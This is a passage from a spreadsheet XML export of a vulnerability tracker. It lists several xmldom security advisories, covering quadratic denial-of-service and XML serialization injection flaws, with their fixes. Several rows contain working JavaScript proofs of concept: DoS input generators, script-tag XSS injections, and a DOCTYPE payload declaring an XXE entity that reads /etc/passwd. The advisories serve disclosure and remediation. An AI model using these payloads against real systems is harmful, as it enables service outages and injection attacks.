`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.
Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).
Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):
- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790
Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):
- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533
### Finding B is additionally reachable programmatically (no parser involved)
`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:
- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.
`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.
## Affected Versions
Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.
## Proof of Concept
Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.
```js
const { DOMParser } = require('@xmldom/xmldom');
// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};
function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}
for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```
Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):
Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):
| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |
Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):
| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |
Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):
| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |
~32 KB of input → several seconds of single-threaded event-loop stall.
### Finding B via the public `normalize()` API (no parser)
```js
const { DOMImplementation } = require('@xmldom/xmldom');
function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```
Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):
| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |
This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.
## Fix Applied
Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t>
        </is>
      </c>
      <c r="T1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="D1061" s="5" t="inlineStr"/>
      <c r="E1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1061" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1061" s="5" t="inlineStr"/>
      <c r="R1061" s="5" t="inlineStr"/>
      <c r="S1061" s="5" t="inlineStr">
        <is>
          <t>## Summary
When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.
## Details
`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:
```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```
https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540
The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.
## Proof of Concept
A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):
```js
const { DOMParser } = require('@xmldom/xmldom');
function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}
for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```
Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):
| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |
About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).
## Impact
Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).
## Severity note
The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.
## Fix Applied
Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t>
        </is>
      </c>
      <c r="T1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="D1062" s="5" t="inlineStr"/>
      <c r="E1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1062" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1062" s="5" t="inlineStr"/>
      <c r="R1062" s="5" t="inlineStr"/>
      <c r="S1062" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.
## Details
`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.
During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:
1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)
However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.
### Root Cause
1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`
## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```
### Injecting elements via PI target
```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);
const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```
## Impact
Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:
- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security
## Fix Applied
Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```
### Why the default stays verbatim
W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)
### Residual limitation
The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t>
        </is>
      </c>
      <c r="T1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="D1063" s="5" t="inlineStr"/>
      <c r="E1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1063" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1063" s="5" t="inlineStr"/>
      <c r="R1063" s="5" t="inlineStr"/>
      <c r="S1063" s="5" t="inlineStr">
        <is>
          <t>## Summary
An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.
## Details
xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.
The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);
// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).
// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```
## Impact
- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.
## Fix Applied
The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);
// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);
// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```
### Why the default stays verbatim
The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.
### Residual limitation
The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t>
        </is>
      </c>
      <c r="T1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="D1064" s="5" t="inlineStr"/>
      <c r="E1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1064" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1064" s="5" t="inlineStr"/>
      <c r="R1064" s="5" t="inlineStr"/>
      <c r="S1064" s="5" t="inlineStr">
        <is>
          <t>## Summary
An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.
## Details
`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Affected Versions
Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```
## Impact
- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.
## Fix Applied
The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.
&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.
### Proof of Concept - fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Opt-in path — now throws instead of emitting the breakout:
